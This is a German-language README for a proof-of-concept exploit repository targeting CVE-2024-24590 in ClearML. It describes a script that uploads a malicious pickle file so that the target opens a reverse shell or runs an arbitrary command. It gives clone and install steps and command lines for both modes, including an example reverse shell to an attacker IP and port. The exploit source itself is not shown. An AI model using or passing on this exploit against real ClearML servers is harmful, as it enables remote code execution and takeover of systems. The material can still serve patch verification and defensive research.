
CVE-2024-24590 ClearML RCE&CMD POC
Dieses Repository enthält ein Python-Exploit-Skript für CVE-2024-24590. Das Skript ist dafür ausgelegt, eine bösartige Pickle-Datei in ClearML hochzuladen, die eine Reverse-Shell oder einen benutzerdefinierten Befehl auf dem Zielsystem ausführt.
Repository klonen:
git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
cd CVE-2024-24590-ClearML-RCE-CMD-POC
ClearML SDK installieren:
pip install clearml
clearml-init
Das Skript unterstützt zwei Betriebsmodi: default und cmd.
In diesem Modus müssen Sie die IP-Adresse und den Port des Angreifers angeben, um eine Reverse-Shell herzustellen.
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
In diesem Modus können Sie einen benutzerdefinierten Befehl angeben, der ausgeführt wird.
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"